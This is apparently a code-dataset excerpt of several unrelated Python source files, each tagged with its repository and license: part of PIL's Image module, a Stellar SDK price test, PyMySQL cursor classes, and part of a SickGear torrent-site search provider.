while 1:
l, s, d = e.encode(bufsize)
data.append(d)
if s:
break
if s < 0:
raise RuntimeError("encoder error %d in tostring" % s)
return string.join(data, "")
##
# Loads this image with pixel data from a string.
# <p>
# This method is similar to the {@link #fromstring} function, but
# loads data into this image instead of creating a new image
# object.
def fromstring(self, data, decoder_name="raw", *args):
"Load data to image from binary string"
# may pass tuple instead of argument list
if len(args) == 1 and isTupleType(args[0]):
args = args[0]
# default format
if decoder_name == "raw" and args == ():
args = self.mode
# unpack data
d = _getdecoder(self.mode, decoder_name, args)
d.setimage(self.im)
s = d.decode(data)
if s[0] >= 0:
raise ValueError("not enough image data")
if s[1] != 0:
raise ValueError("cannot decode image data")
##
# Allocates storage for the image and loads the pixel data. In
# normal cases, you don't need to call this method, since the
# Image class automatically loads an opened image when it is
# accessed for the first time.
#
def load(self):
"Explicitly load pixel data."
if self.im and self.palette and self.palette.dirty:
# realize palette
apply(self.im.putpalette, self.palette.getdata())
self.palette.dirty = 0
self.palette.mode = "RGB"
self.palette.rawmode = None
if self.info.has_key("transparency"):
self.im.putpalettealpha(self.info["transparency"], 0)
self.palette.mode = "RGBA"
##
# Verifies the contents of a file. For data read from a file, this
# method attempts to determine if the file is broken, without
# actually decoding the image data. If this method finds any
# problems, it raises suitable exceptions. If you need to load
# the image after using this method, you must reopen the image
# file.
def verify(self):
"Verify file contents."
pass
##
# Copies this image. Use this method if you wish to paste things
# into an image, but still retain the original.
#
# @return An Image object.
def copy(self):
"Copy raster data"
self.load()
im = self.im.copy()
return self._new(im)
##
# Configures the image file loader so it returns a version of the
# image that as closely as possible matches the given mode and
# size. For example, you can use this method to convert a colour
# JPEG to greyscale while loading it, or to extract a 128x192
# version from a PCD file.
# <p>
# Note that this method modifies the Image object in place. If
# the image has already been loaded, this method has no effect.
#
# @param mode The requested mode.
# @param size The requested size.
def draft(self, mode, size):
"Configure image decoder"
pass
##
# Returns a tuple containing the name of each band in this image.
# For example, <b>getbands</b> on an RGB image returns ("R", "G", "B").
#
# @return A tuple containing band names.
def getbands(self):
"Get band names"
return ImageMode.getmode(self.mode).bands
##
# Returns a PyCObject that points to the internal image memory.
#
# @return A PyCObject object.
def getim(self):
"Get PyCObject pointer to internal image memory"
self.load()
return self.im.ptr
##
# Returns the image palette as a list.
#
# @return A list of color values [r, g, b, ...], or None if the
# image has no palette.
def getpalette(self):
"Get palette contents."
self.load()
try:
return map(ord, self.im.getpalette())
except ValueError:
return None # no palette
##
# Adds or replaces the alpha layer in this image. If the image
# does not have an alpha layer, it's converted to "LA" or "RGBA".
# The new layer must be either "L" or "1".
#
# @param im The new alpha layer. This can either be an "L" or "1"
# image having the same size as this image, or an integer or
# other color value.
def putalpha(self, alpha):
"Set alpha layer"
self.load()
if self.readonly:
self._copy()
if self.mode not in ("LA", "RGBA"):
# attempt to promote self to a matching alpha mode
try:
mode = getmodebase(self.mode) + "A"
try:
self.im.setmode(mode)
except (AttributeError, ValueError):
# do things the hard way
im = self.im.convert(mode)
if im.mode not in ("LA", "RGBA"):
raise ValueError # sanity check
self.im = im
self.mode = self.im.mode
except (KeyError, ValueError):
raise ValueError("illegal image mode")
if self.mode == "LA":
band = 1
else:
band = 3
if isImageType(alpha):
# alpha layer
if alpha.mode not in ("1", "L"):
raise ValueError("illegal image mode")
alpha.load()
if alpha.mode == "1":
alpha = alpha.convert("L")
else:
# constant alpha
try:
self.im.fillband(band, alpha)
except (AttributeError, ValueError):
# do things the hard way
alpha = new("L", self.size, alpha)
else:
return
self.im.putband(alpha.im, band)
##
# Attaches a palette to this image. The image must be a "P" or
# "L" image, and the palette sequence must contain 768 integer
# values, where each group of three values represent the red,
# green, and blue values for the corresponding pixel
# index. Instead of an integer sequence, you can use an 8-bit
# string.
#
# @def putpalette(data)
# @param data A palette sequence (either a list or a string).
def putpalette(self, data, rawmode="RGB"):
"Put palette data into an image."
self.load()
if self.mode not in ("L", "P"):
raise ValueError("illegal image mode")
if not isStringType(data):
data = string.join(map(chr, data), "")
self.mode = "P"
self.palette = ImagePalette.raw(rawmode, data)
self.palette.mode = "RGB"
self.load() # install new palette
##
# Saves this image under the given filename. If no format is
# specified, the format to use is determined from the filename
# extension, if possible.
# <p>
# Keyword options can be used to provide additional instructions
# to the writer. If a writer doesn't recognise an option, it is
# silently ignored. The available options are described later in
# this handbook.
# <p>
# You can use a file object instead of a filename. In this case,
# you must always specify the format. The file object must
# implement the <b>seek</b>, <b>tell</b>, and <b>write</b>
# methods, and be opened in binary mode.
#
# @def save(file, format=None, **options)
# @param file File name or file object.
# @param format Optional format override. If omitted, the
# format to use is determined from the filename extension.
# If a file object was used instead of a filename, this
# parameter should always be used.
# @param **options Extra parameters to the image writer.
# @return None
# @exception KeyError If the output format could not be determined
# from the file name. Use the format option to solve this.
# @exception IOError If the file could not be written. The file
# may have been created, and may contain partial data.
def save(self, fp, format=None, **params):
"Save image to file or stream"
if isStringType(fp):
filename = fp
else:
if hasattr(fp, "name") and isStringType(fp.name):
filename = fp.name
else:
filename = ""
# may mutate self!
self.load()
self.encoderinfo = params
self.encoderconfig = ()
preinit()
ext = string.lower(os.path.splitext(filename)[1])
if not format:
try:
format = EXTENSION[ext]
except KeyError:
init()
try:
format = EXTENSION[ext]
except KeyError:
raise KeyError(ext) # unknown extension
try:
save_handler = SAVE[string.upper(format)]
except KeyError:
init()
save_handler = SAVE[string.upper(format)] # unknown format
if isStringType(fp):
import __builtin__
fp = __builtin__.open(fp, "wb")
close = 1
else:
close = 0
try:
save_handler(self, fp, filename)
finally:
# do what we can to clean up
if close:
fp.close()
##
# Seeks to the given frame in this sequence file. If you seek
# beyond the end of the sequence, the method raises an
# <b>EOFError</b> exception. When a sequence file is opened, the
# library automatically seeks to frame 0.
# <p>
# Note that in the current version of the library, most sequence
# formats only allows you to seek to the next frame.
#
# @param frame Frame number, starting at 0.
# @exception EOFError If the call attempts to seek beyond the end
# of the sequence.
# @see #Image.tell
def seek(self, frame):
"Seek to given frame in sequence file"
# overridden by file handlers
if frame != 0:
raise EOFError
##
# Split this image into individual bands. This method returns a
# tuple of individual image bands from an image. For example,
# splitting an "RGB" image creates three new images each
# containing a copy of one of the original bands (red, green,
# blue).
#
# @return A tuple containing bands.
def split(self):
"Split image into bands"
ims = []
self.load()
for i in range(self.im.bands):
ims.append(self._new(self.im.getband(i)))
return tuple(ims)
##
# Returns the current frame number.
#
# @return Frame number, starting with 0.
# @see #Image.seek
def tell(self):
"Return current frame number"
return 0
##
# Creates a new image with the given mode and size.
#
# @param mode The mode to use for the new image.
# @param size A 2-tuple, containing (width, height) in pixels.
# @return An Image object.
def new(mode, size):
"Create a new image"
return Image()._new(core.new(mode, size))
##
# Creates an image memory from pixel data in a string.
# <p>
# In its simplest form, this function takes three arguments
# (mode, size, and unpacked pixel data).
# <p>
# You can also use any pixel decoder supported by PIL. For more
# information on available decoders, see the section <a
# href="pil-decoder.htm"><i>Writing Your Own File Decoder</i></a>.
# <p>
# Note that this function decodes pixel data only, not entire images.
# If you have an entire image in a string, wrap it in a
# <b>StringIO</b> object, and use {@link #open} to load it.
#
# @param mode The image mode.
# @param size The image size.
# @param data An 8-bit string containing raw data for the given mode.
# @param decoder_name What decoder to use.
# @param *args Additional parameters for the given decoder.
# @return An Image object.
def fromstring(mode, size, data, decoder_name="raw", *args):
"Load image from string"
# may pass tuple instead of argument list
if len(args) == 1 and isTupleType(args[0]):
args = args[0]
if decoder_name == "raw" and args == ():
args = mode
im = new(mode, size)
im.fromstring(data, decoder_name, args)
return im
##
# (New in 1.1.4) Creates an image memory from pixel data in a string
# or byte buffer.
# <p>
# This function is similar to {@link #fromstring}, but uses data in
# the byte buffer, where possible. This means that changes to the
# original buffer object are reflected in this image). Not all modes
# can share memory; supported modes include "L", "RGBX", "RGBA", and
# "CMYK".
# <p>
# Note that this function decodes pixel data only, not entire images.
# If you have an entire image file in a string, wrap it in a
# <b>StringIO</b> object, and use {@link #open} to load it.
# <p>
# In the current version, the default parameters used for the "raw"
# decoder differs from that used for {@link fromstring}. This is a
# bug, and will probably be fixed in a future release. The current
# release issues a warning if you do this; to disable the warning,
# you should provide the full set of parameters. See below for
# details.
#
# @param mode The image mode.
# @param size The image size.
# @param data An 8-bit string or other buffer object containing raw
# data for the given mode.
# @param decoder_name What decoder to use.
# @param *args Additional parameters for the given decoder. For the
# default encoder ("raw"), it's recommended that you provide the
# full set of parameters:
# <b>frombuffer(mode, size, data, "raw", mode, 0, 1)</b>.
# @return An Image object.
# @since 1.1.4
def frombuffer(mode, size, data, decoder_name="raw", *args):
"Load image from string or buffer"
# may pass tuple instead of argument list
if len(args) == 1 and isTupleType(args[0]):
args = args[0]
if decoder_name == "raw":
if args == ():
if warnings:
warnings.warn(
"the frombuffer defaults may change in a future release; "
"for portability, change the call to read:\n"
" frombuffer(mode, size, data, 'raw', mode, 0, 1)",
RuntimeWarning, stacklevel=2
)
args = mode, 0, -1 # may change to (mode, 0, 1) post-1.1.6
if args[0] in _MAPMODES:
im = new(mode, (1,1))
im = im._new(
core.map_buffer(data, size, decoder_name, None, 0, args)
)
im.readonly = 1
return im
return apply(fromstring, (mode, size, data, decoder_name, args))
##
# (New in 1.1.6) Create an image memory from an object exporting
# the array interface (using the buffer protocol).
#
# If obj is not contiguous, then the tostring method is called
# and {@link frombuffer} is used.
#
# @param obj Object with array interface
# @return An image memory.
_mode_dict = {
'u1' : 'L',
'u2' : 'S',
'b1' : '1',
'i4' : 'I',
'f4' : 'F',
}
def fromarray(obj):
arr = obj.__array_interface__
shape = arr['shape']
ndim = len(shape)
if ndim < 2 or ndim > 3:
raise TypeError("Only 2 and 3-dimensional arrays can be converted to images.")
try:
strides = arr['strides']
except KeyError:
strides = None
typestr = arr['typestr']
endian = typestr[0]
type_bits = typestr[1:]
try:
mode = _mode_dict[type_bits]
except:
raise TypeError("Only arrays of type uint8, uint16, bool, int32, and float32 can be converted to images.")
if ndim == 3:
if mode != 'L':
raise TypeError("Can only unpack 8-bit values into LA/RGB/RGBA images.")
if shape[2] == 2:
mode = 'LA'
elif shape[2] == 3:
mode = 'RGB'
elif shape[2] == 4:
mode = 'RGBA'
else:
raise TypeError("Can only unpack LA/RGB/RGBA images")
size = shape[:2][::-1]
if mode == '1':
import numpy
obj = numpy.packbits(obj.astype(numpy.uint8).flat).tostring()
elif strides is not None:
obj = obj.tostring()
return frombuffer(mode, size, obj, "raw", mode, 0, 1)
##
# Opens and identifies the given image file.
# <p>
# This is a lazy operation; this function identifies the file, but the
# actual image data is not read from the file until you try to process
# the data (or call the {@link #Image.load} method).
#
# @def open(file, mode="r")
# @param file A filename (string) or a file object. The file object
# must implement <b>read</b>, <b>seek</b>, and <b>tell</b> methods,
# and be opened in binary mode.
# @param mode The mode. If given, this argument must be "r".
# @return An Image object.
# @exception IOError If the file cannot be found, or the image cannot be
# opened and identified.
# @see #new
def open(fp, mode="r"):
"Open an image file, without loading the raster data"
if mode != "r":
raise ValueError("bad mode")
if isStringType(fp):
import __builtin__
filename = fp
fp = __builtin__.open(fp, "rb")
else:
filename = ""
prefix = fp.read(16)
preinit()
for i in ID:
try:
factory, accept = OPEN[i]
if not accept or accept(prefix):
fp.seek(0)
return factory(fp, filename)
except (SyntaxError, IndexError, TypeError):
pass
init()
for i in ID:
try:
factory, accept = OPEN[i]
if not accept or accept(prefix):
fp.seek(0)
return factory(fp, filename)
except (SyntaxError, IndexError, TypeError):
pass
raise IOError("cannot identify image file")
# --------------------------------------------------------------------
# Plugin registry
##
# Register an image file plugin. This function should not be used
# in application code.
#
# @param id An image format identifier.
# @param factory An image file factory method.
# @param accept An optional function that can be used to quickly
# reject images having another format.
def register_open(id, factory, accept=None):
id = string.upper(id)
ID.append(id)
OPEN[id] = factory, accept
##
# Registers an image MIME type. This function should not be used
# in application code.
#
# @param id An image format identifier.
# @param mimetype The image MIME type for this format.
def register_mime(id, mimetype):
MIME[string.upper(id)] = mimetype
##
# Registers an image save function. This function should not be
# used in application code.
#
# @param id An image format identifier.
# @param driver A function to save images in this format.
def register_save(id, driver):
SAVE[string.upper(id)] = driver
##
# Registers an image extension. This function should not be
# used in application code.
#
# @param id An image format identifier.
# @param extension An extension used for this format.
def register_extension(id, extension):
EXTENSION[string.lower(extension)] = string.upper(id)
| tdsmith/celltool | celltool/utility/pil_lite/PIL/Image.py | Python | gpl-2.0 | 30,891 |
from stellar_sdk import Price
class TestPrice:
def test_xdr(self):
n, d = 1, 2
price_obj = Price(n, d).to_xdr_object()
assert price_obj.to_xdr() == "AAAAAQAAAAI="
from_instance = Price.from_xdr_object(price_obj)
assert isinstance(from_instance, Price)
assert from_instance.n == n
assert from_instance.d == d
def test_from_raw_price(self):
raw_price = "2.93850088"
price = Price.from_raw_price(raw_price)
assert price.n == 36731261
assert price.d == 12500000
def test_equals(self):
assert Price(1, 2) == Price(1, 2)
assert Price(1, 2) != Price(3, 4)
assert Price(1, 2) != "BAD TYPE"
| StellarCN/py-stellar-base | tests/test_price.py | Python | apache-2.0 | 710 |
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import
from functools import partial
import re
import warnings
from ._compat import range_type, text_type, PY2
from . import err
#: Regular expression for :meth:`Cursor.executemany`.
#: executemany only suports simple bulk insert.
#: You can use it to load large dataset.
RE_INSERT_VALUES = re.compile(
r"\s*((?:INSERT|REPLACE)\b.+\bVALUES?\s*)" +
r"(\(\s*(?:%s|%\(.+\)s)\s*(?:,\s*(?:%s|%\(.+\)s)\s*)*\))" +
r"(\s*(?:ON DUPLICATE.*)?);?\s*\Z",
re.IGNORECASE | re.DOTALL)
class Cursor(object):
"""
This is the object you use to interact with the database.
Do not create an instance of a Cursor yourself. Call
connections.Connection.cursor().
See `Cursor <https://www.python.org/dev/peps/pep-0249/#cursor-objects>`_ in
the specification.
"""
#: Max statement size which :meth:`executemany` generates.
#:
#: Max size of allowed statement is max_allowed_packet - packet_header_size.
#: Default value of max_allowed_packet is 1048576.
max_stmt_length = 1024000
_defer_warnings = False
def __init__(self, connection):
self.connection = connection
self.description = None
self.rownumber = 0
self.rowcount = -1
self.arraysize = 1
self._executed = None
self._result = None
self._rows = None
self._warnings_handled = False
def close(self):
"""
Closing a cursor just exhausts all remaining data.
"""
conn = self.connection
if conn is None:
return
try:
while self.nextset():
pass
finally:
self.connection = None
def __enter__(self):
return self
def __exit__(self, *exc_info):
del exc_info
self.close()
def _get_db(self):
if not self.connection:
raise err.ProgrammingError("Cursor closed")
return self.connection
def _check_executed(self):
if not self._executed:
raise err.ProgrammingError("execute() first")
def _conv_row(self, row):
return row
def setinputsizes(self, *args):
"""Does nothing, required by DB API."""
def setoutputsizes(self, *args):
"""Does nothing, required by DB API."""
def _nextset(self, unbuffered=False):
"""Get the next query set"""
conn = self._get_db()
current_result = self._result
# for unbuffered queries warnings are only available once whole result has been read
if unbuffered:
self._show_warnings()
if current_result is None or current_result is not conn._result:
return None
if not current_result.has_next:
return None
self._result = None
self._clear_result()
conn.next_result(unbuffered=unbuffered)
self._do_get_result()
return True
def nextset(self):
return self._nextset(False)
def _ensure_bytes(self, x, encoding=None):
if isinstance(x, text_type):
x = x.encode(encoding)
elif isinstance(x, (tuple, list)):
x = type(x)(self._ensure_bytes(v, encoding=encoding) for v in x)
return x
def _escape_args(self, args, conn):
ensure_bytes = partial(self._ensure_bytes, encoding=conn.encoding)
if isinstance(args, (tuple, list)):
if PY2:
args = tuple(map(ensure_bytes, args))
return tuple(conn.literal(arg) for arg in args)
elif isinstance(args, dict):
if PY2:
args = {ensure_bytes(key): ensure_bytes(val) for
(key, val) in args.items()}
return {key: conn.literal(val) for (key, val) in args.items()}
else:
# If it's not a dictionary let's try escaping it anyways.
# Worst case it will throw a Value error
if PY2:
args = ensure_bytes(args)
return conn.escape(args)
def mogrify(self, query, args=None):
"""
Returns the exact string that is sent to the database by calling the
execute() method.
This method follows the extension to the DB API 2.0 followed by Psycopg.
"""
conn = self._get_db()
if PY2: # Use bytes on Python 2 always
query = self._ensure_bytes(query, encoding=conn.encoding)
if args is not None:
query = query % self._escape_args(args, conn)
return query
def execute(self, query, args=None):
"""Execute a query
:param str query: Query to execute.
:param args: parameters used with query. (optional)
:type args: tuple, list or dict
:return: Number of affected rows
:rtype: int
If args is a list or tuple, %s can be used as a placeholder in the query.
If args is a dict, %(name)s can be used as a placeholder in the query.
"""
while self.nextset():
pass
query = self.mogrify(query, args)
result = self._query(query)
self._executed = query
return result
def executemany(self, query, args):
# type: (str, list) -> int
"""Run several data against one query
:param query: query to execute on server
:param args: Sequence of sequences or mappings. It is used as parameter.
:return: Number of rows affected, if any.
This method improves performance on multiple-row INSERT and
REPLACE. Otherwise it is equivalent to looping over args with
execute().
"""
if not args:
return
m = RE_INSERT_VALUES.match(query)
if m:
q_prefix = m.group(1) % ()
q_values = m.group(2).rstrip()
q_postfix = m.group(3) or ''
assert q_values[0] == '(' and q_values[-1] == ')'
return self._do_execute_many(q_prefix, q_values, q_postfix, args,
self.max_stmt_length,
self._get_db().encoding)
self.rowcount = sum(self.execute(query, arg) for arg in args)
return self.rowcount
def _do_execute_many(self, prefix, values, postfix, args, max_stmt_length, encoding):
conn = self._get_db()
escape = self._escape_args
if isinstance(prefix, text_type):
prefix = prefix.encode(encoding)
if PY2 and isinstance(values, text_type):
values = values.encode(encoding)
if isinstance(postfix, text_type):
postfix = postfix.encode(encoding)
sql = bytearray(prefix)
args = iter(args)
v = values % escape(next(args), conn)
if isinstance(v, text_type):
if PY2:
v = v.encode(encoding)
else:
v = v.encode(encoding, 'surrogateescape')
sql += v
rows = 0
for arg in args:
v = values % escape(arg, conn)
if isinstance(v, text_type):
if PY2:
v = v.encode(encoding)
else:
v = v.encode(encoding, 'surrogateescape')
if len(sql) + len(v) + len(postfix) + 1 > max_stmt_length:
rows += self.execute(sql + postfix)
sql = bytearray(prefix)
else:
sql += b','
sql += v
rows += self.execute(sql + postfix)
self.rowcount = rows
return rows
def callproc(self, procname, args=()):
"""Execute stored procedure procname with args
procname -- string, name of procedure to execute on server
args -- Sequence of parameters to use with procedure
Returns the original args.
Compatibility warning: PEP-249 specifies that any modified
parameters must be returned. This is currently impossible
as they are only available by storing them in a server
variable and then retrieved by a query. Since stored
procedures return zero or more result sets, there is no
reliable way to get at OUT or INOUT parameters via callproc.
The server variables are named @_procname_n, where procname
is the parameter above and n is the position of the parameter
(from zero). Once all result sets generated by the procedure
have been fetched, you can issue a SELECT @_procname_0, ...
query using .execute() to get any OUT or INOUT values.
Compatibility warning: The act of calling a stored procedure
itself creates an empty result set. This appears after any
result sets generated by the procedure. This is non-standard
behavior with respect to the DB-API. Be sure to use nextset()
to advance through all result sets; otherwise you may get
disconnected.
"""
conn = self._get_db()
if args:
fmt = '@_{0}_%d=%s'.format(procname)
self._query('SET %s' % ','.join(fmt % (index, conn.escape(arg))
for index, arg in enumerate(args)))
self.nextset()
q = "CALL %s(%s)" % (procname,
','.join(['@_%s_%d' % (procname, i)
for i in range_type(len(args))]))
self._query(q)
self._executed = q
return args
def fetchone(self):
"""Fetch the next row"""
self._check_executed()
if self._rows is None or self.rownumber >= len(self._rows):
return None
result = self._rows[self.rownumber]
self.rownumber += 1
return result
def fetchmany(self, size=None):
"""Fetch several rows"""
self._check_executed()
if self._rows is None:
return ()
end = self.rownumber + (size or self.arraysize)
result = self._rows[self.rownumber:end]
self.rownumber = min(end, len(self._rows))
return result
def fetchall(self):
"""Fetch all the rows"""
self._check_executed()
if self._rows is None:
return ()
if self.rownumber:
result = self._rows[self.rownumber:]
else:
result = self._rows
self.rownumber = len(self._rows)
return result
def scroll(self, value, mode='relative'):
self._check_executed()
if mode == 'relative':
r = self.rownumber + value
elif mode == 'absolute':
r = value
else:
raise err.ProgrammingError("unknown scroll mode %s" % mode)
if not (0 <= r < len(self._rows)):
raise IndexError("out of range")
self.rownumber = r
def _query(self, q):
conn = self._get_db()
self._last_executed = q
self._clear_result()
conn.query(q)
self._do_get_result()
return self.rowcount
def _clear_result(self):
self.rownumber = 0
self._result = None
self.rowcount = 0
self.description = None
self.lastrowid = None
self._rows = None
def _do_get_result(self):
conn = self._get_db()
self._result = result = conn._result
self.rowcount = result.affected_rows
self.description = result.description
self.lastrowid = result.insert_id
self._rows = result.rows
self._warnings_handled = False
if not self._defer_warnings:
self._show_warnings()
def _show_warnings(self):
if self._warnings_handled:
return
self._warnings_handled = True
if self._result and (self._result.has_next or not self._result.warning_count):
return
ws = self._get_db().show_warnings()
if ws is None:
return
for w in ws:
msg = w[-1]
if PY2:
if isinstance(msg, unicode):
msg = msg.encode('utf-8', 'replace')
warnings.warn(err.Warning(*w[1:3]), stacklevel=4)
def __iter__(self):
return iter(self.fetchone, None)
Warning = err.Warning
Error = err.Error
InterfaceError = err.InterfaceError
DatabaseError = err.DatabaseError
DataError = err.DataError
OperationalError = err.OperationalError
IntegrityError = err.IntegrityError
InternalError = err.InternalError
ProgrammingError = err.ProgrammingError
NotSupportedError = err.NotSupportedError
class DictCursorMixin(object):
# You can override this to use OrderedDict or other dict-like types.
dict_type = dict
def _do_get_result(self):
super(DictCursorMixin, self)._do_get_result()
fields = []
if self.description:
for f in self._result.fields:
name = f.name
if name in fields:
name = f.table_name + '.' + name
fields.append(name)
self._fields = fields
if fields and self._rows:
self._rows = [self._conv_row(r) for r in self._rows]
def _conv_row(self, row):
if row is None:
return None
return self.dict_type(zip(self._fields, row))
class DictCursor(DictCursorMixin, Cursor):
"""A cursor which returns results as a dictionary"""
class SSCursor(Cursor):
"""
Unbuffered Cursor, mainly useful for queries that return a lot of data,
or for connections to remote servers over a slow network.
Instead of copying every row of data into a buffer, this will fetch
rows as needed. The upside of this is the client uses much less memory,
and rows are returned much faster when traveling over a slow network
or if the result set is very big.
There are limitations, though. The MySQL protocol doesn't support
returning the total number of rows, so the only way to tell how many rows
there are is to iterate over every row returned. Also, it currently isn't
possible to scroll backwards, as only the current row is held in memory.
"""
_defer_warnings = True
def _conv_row(self, row):
return row
def close(self):
conn = self.connection
if conn is None:
return
if self._result is not None and self._result is conn._result:
self._result._finish_unbuffered_query()
try:
while self.nextset():
pass
finally:
self.connection = None
__del__ = close
def _query(self, q):
conn = self._get_db()
self._last_executed = q
self._clear_result()
conn.query(q, unbuffered=True)
self._do_get_result()
return self.rowcount
def nextset(self):
return self._nextset(unbuffered=True)
def read_next(self):
"""Read next row"""
return self._conv_row(self._result._read_rowdata_packet_unbuffered())
def fetchone(self):
"""Fetch next row"""
self._check_executed()
row = self.read_next()
if row is None:
self._show_warnings()
return None
self.rownumber += 1
return row
def fetchall(self):
"""
Fetch all, as per MySQLdb. Pretty useless for large queries, as
it is buffered. See fetchall_unbuffered(), if you want an unbuffered
generator version of this method.
"""
return list(self.fetchall_unbuffered())
def fetchall_unbuffered(self):
"""
Fetch all, implemented as a generator, which isn't to standard,
however, it doesn't make sense to return everything in a list, as that
would use ridiculous memory for large result sets.
"""
return iter(self.fetchone, None)
def __iter__(self):
return self.fetchall_unbuffered()
def fetchmany(self, size=None):
"""Fetch many"""
self._check_executed()
if size is None:
size = self.arraysize
rows = []
for i in range_type(size):
row = self.read_next()
if row is None:
self._show_warnings()
break
rows.append(row)
self.rownumber += 1
return rows
def scroll(self, value, mode='relative'):
self._check_executed()
if mode == 'relative':
if value < 0:
raise err.NotSupportedError(
"Backwards scrolling not supported by this cursor")
for _ in range_type(value):
self.read_next()
self.rownumber += value
elif mode == 'absolute':
if value < self.rownumber:
raise err.NotSupportedError(
"Backwards scrolling not supported by this cursor")
end = value - self.rownumber
for _ in range_type(end):
self.read_next()
self.rownumber = value
else:
raise err.ProgrammingError("unknown scroll mode %s" % mode)
class SSDictCursor(DictCursorMixin, SSCursor):
"""An unbuffered cursor, which returns results as a dictionary"""
| imron/scalyr-agent-2 | scalyr_agent/third_party/pymysql/cursors.py | Python | apache-2.0 | 17,238 |
# coding=utf-8
#
# This file is part of SickGear.
#
# SickGear is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickGear is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickGear. If not, see <http://www.gnu.org/licenses/>.
import random
import re
import time
import traceback
from . import generic
from .. import logger
from ..config import naming_ep_type
from ..helpers import try_int
from bs4_parser import BS4Parser
from dateutil.parser import parse
from _23 import unidecode, unquote_plus
from six import iteritems
class TVChaosUKProvider(generic.TorrentProvider):
def __init__(self):
generic.TorrentProvider.__init__(self, 'TVChaosUK')
self.url_base = 'https://tvchaosuk.com/'
self.urls = {'config_provider_home_uri': self.url_base,
'login_action': self.url_base + 'login',
'search': self.url_base + 'torrents/filter?%s' % '&'.join(
['search=%s', 'page=0', 'tmdb=', 'imdb=', 'tvdb=', 'description=', 'uploader=', 'view=list',
'start_year=', 'end_year=', 'sorting=created_at', 'direction=desc', 'qty=100', '_token=%s',
'types[]=SD', 'types[]=HD720p', 'types[]=HD1080p',
'types[]=SD Pack', 'types[]=HD720p Pack', 'types[]=HD1080p Pack'])}
self.url = self.urls['config_provider_home_uri']
self.username, self.password, self._token, \
self.freeleech, self.minseed, self.minleech, self.use_after_get_data = 7 * [None]
def _authorised(self, **kwargs):
return super(TVChaosUKProvider, self)._authorised(logged_in=self.logged_in, post_params={'remember': '1'})
def logged_in(self, resp=None):
result = True
if not self._token:
try:
result = 'Username' not in resp and 'Logout' in resp
input_tag = re.findall(r'(<input[^>]+?"(?:hidden|_token)"[^>]+?"(?:hidden|_token)"[^>]+?>)', resp)[0]
token = re.findall(r'value\s*=\s*["\']\s*([^"\'\s]+)', input_tag)[0]
csrf = re.findall(r'<meta[^>]+csrf-token[^>]+content[^"]+"\s*([^\s"]+)', resp)[0]
self._token = result and csrf == token and token
except (BaseException, Exception):
result = False
return result
def _search_provider(self, search_params, **kwargs):
results = []
if not self._authorised():
return results
items = {'Cache': [], 'Season': [], 'Episode': [], 'Propers': []}
rc = dict([(k, re.compile('(?i)' + v)) for (k, v) in iteritems({
'info': r'/torrents?/(?P<tid>(?P<tid_num>\d{2,})[^"]*)', 'get': 'download'})])
for mode in search_params:
for search_string in search_params[mode]:
search_string = unidecode(unquote_plus(search_string))
vals = [i for i in range(5, 16)]
random.SystemRandom().shuffle(vals)
attempts = html = soup = tbl = None
fetch = 'failed fetch'
for attempts, s in enumerate((0, vals[0], vals[5], vals[10])):
time.sleep(s)
html = self.get_url(self.urls['search'] % (search_string, self._token))
if self.should_skip():
return results
if html:
try:
soup = BS4Parser(html).soup
tbl = soup.find('table', class_='table')
if tbl:
fetch = 'data fetched'
break
except (BaseException, Exception):
pass
if attempts:
logger.log('%s %s after %s attempts' % (mode, fetch, attempts+1))
cnt = len(items[mode])
try:
if not html or self._has_no_results(html) or not tbl:
raise generic.HaltParseException
tbl_rows = tbl.find_all('tr')
if 2 > len(tbl_rows):
raise generic.HaltParseException
head = None
for tr in tbl_rows[1:]:
cells = tr.find_all('td')
if 6 > len(cells):
continue
try:
head = head if None is not head else self._header_row(tr)
seeders, leechers, size = [try_int(n, n) for n in [
cells[head[x]].get_text().strip() for x in ('seed', 'leech', 'size')]]
if self._reject_item(seeders, leechers, self.freeleech and (
None is tr.find('i', class_='fa-star'))):
continue
title = tr.find('a', href=rc['info']).get_text().strip()
download_url = self._link(tr.find('a', href=rc['get'])['href'])
except (BaseException, Exception):
continue
try:
titles = self.regulate_title(title, mode, search_string)
if download_url and titles:
for title in titles:
items[mode].append((title, download_url, seeders, self._bytesizer(size)))
except (BaseException, Exception):
pass
except generic.HaltParseException:
pass
except (BaseException, Exception):
logger.log(u'Failed to parse. Traceback: %s' % traceback.format_exc(), logger.ERROR)
if soup:
soup.clear(True)
del soup
self._log_search(mode, len(items[mode]) - cnt,
('search string: ' + search_string.replace('%', '%%'), self.name)['Cache' == mode])
if mode in 'Season' and len(items[mode]):
break
results = self._sort_seeding(mode, results + items[mode])
return results
@staticmethod
def regulate_title(title, mode='-', search_string=''):
# normalise abnormal naming patterns e.g. 2019/20 -> 2019
title = re.sub(r'((?:19|20)\d\d)/20(\d\d)?', r'\1', title)
# s<x> ep<y> -> s<x>e<y>
title = re.sub(r'(?i)s(\d\d+)[\W]*?e+(?:p|pisode)*(\d\d+)', r'S\1E\2', title)
has_series = re.findall(r'(?i)(.*?series[^\d]*?\d+)(.*)', title)
if has_series:
rc_xtras = re.compile(r'(?i)([. _-]|^)(special|extra)s?\w*([. _-]|$)')
has_special = rc_xtras.findall(has_series[0][1])
if has_special:
title = has_series[0][0] + rc_xtras.sub(list(set(
list(has_special[0][0]) + list(has_special[0][2])))[0], has_series[0][1])
title = re.sub('(?i)series', r'Season', title)
years = re.findall(r'((?:19|20)\d\d)', title)
title = re.sub(r'(19|20)\d\d', r'{{yr}}', title)
title_parts = re.findall(
r'(?im)^(.*?)(?:Season[^\d]*?(\d+).*?)?' +
r'(?:(?:pack|part|pt)\W*?)?(\d+)[^\d]*?of[^\d]*?(?:\d+)(.*?)$', title)
sxe_build = None
if len(title_parts):
new_parts = [try_int(part, part) for part in title_parts[0]]
if not new_parts[1]:
new_parts[1] = 1
new_parts[2] = ('E%02d', ' Pack %d')[any([re.search('(?i)season|series', title),
mode in 'Season'])] % new_parts[2]
sxe_build = 'S%02d%s' % tuple(new_parts[1:3])
title = '%s`%s`%s' % (new_parts[0], sxe_build, new_parts[-1])
for yr in years:
# noinspection RegExpRedundantEscape
title = re.sub(r'\{\{yr\}\}', yr, title, count=1)
